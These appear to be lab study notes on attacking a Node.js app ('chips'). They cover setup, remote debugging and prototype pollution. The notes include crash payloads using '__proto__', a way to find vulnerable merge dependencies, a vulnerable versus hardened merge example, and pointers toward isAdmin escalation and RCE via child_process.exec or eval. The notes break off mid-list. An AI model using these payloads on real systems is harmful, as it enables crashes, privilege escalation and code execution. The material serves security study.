Preparations
Code Sync
rsync -az --compress-level=1 student@chips:/home/student/chips/ chips/
Directory Structure
tree -L 3 /chips
Analysis
Files in Source Code
- Dockerfile, docker-compose.yml
- package.json
- routes/
- ./bin/www
Observations
- How is the application started? (./bin/www)
- Requirements (var app = require('../app');)
- Environment Variables (t_engine = process.env.TEMPLATING_ENGINE;)
- Understand the layout of the application (docker-compose.yml)
Remote Debugging
.vscode/launch.json
docker-compose -f ~/chips/docker-compose.yml exec chips node --inspect=0.0.0.0:9228
Prototype Pollution
Black Box
{"__proto__":{"toString": "abc"}} // crash application
{"__proto__":{"hasOwnProperty": "abc"}}
White Box - Proof of Concept
- View source code of application (typically not found there)
- View 1st and 2nd level dependencies
- Look for package with: Merge, Extend, Clone, Set, Deep, Copy, Assign, Recursive
- NPM List:
docker-compose -f ~/chips/docker-compose.yml run chips npm list -prod -depth 1
- NPM Audit:
docker-compose -f ~/chips/docker-compose.yml run chips npm audit
- If package is vulnerable, search application:
const DeepExtend = require('deep-extend');
- Locate user-supplied data (otherwise not exploitable, move on)
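How the merge-style packages listed above get polluted, shown as an added JavaScript example (not code from the chips application or from deep-extend): a minimal recursive merge that reaches Object.prototype from a parsed JSON body, beside a hardened version, plus a helper that reports whether an unrelated object now inherits isAdmin. The request body and the key names are constructed.

```javascript
// Added example, not code from the chips application or its dependencies.
// A minimal recursive merge of the kind the notes say to look for
// (deep-extend / merge style), beside a hardened version.

const isObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Vulnerable: for..in walks every key of the parsed body, including the own
// "__proto__" key JSON.parse creates, and target["__proto__"] resolves to
// Object.prototype, so the nested keys land on every object in the process.
function unsafeMerge(target, source) {
  for (const key in source) {
    if (isObject(source[key])) {
      if (!isObject(target[key])) target[key] = {};
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened: own keys only, prototype-related keys skipped, and nested
// targets created without a prototype chain to climb.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED.has(key)) continue;
    if (isObject(source[key])) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isObject(target[key])) target[key] = Object.create(null);
      safeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Mimics a route that merges a JSON body into defaults, then reports whether
// an unrelated object now inherits isAdmin (the privilege-escalation check the
// notes mention). Cleans up so repeated calls start from a clean prototype.
function mergeThenCheck(mergeFn, body) {
  const settings = mergeFn({ theme: 'light' }, JSON.parse(body));
  const polluted = ({}).isAdmin === true;
  delete Object.prototype.isAdmin;
  return { theme: settings.theme, polluted };
}

// Constructed sample request body; key names are illustrative.
const SAMPLE_BODY = '{"__proto__":{"isAdmin":true},"theme":"dark"}';
```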
White Box - Exploitation
- isAdmin value for privilege escalation
- child_process.exec, eval or vm.runInNewContext value for RCE
- Find dependencies to exploit:
- NPM List:
docker-compose -f ~/chips/docker-compose.yml run chips npm list -prod -depth 0
- NPM List:
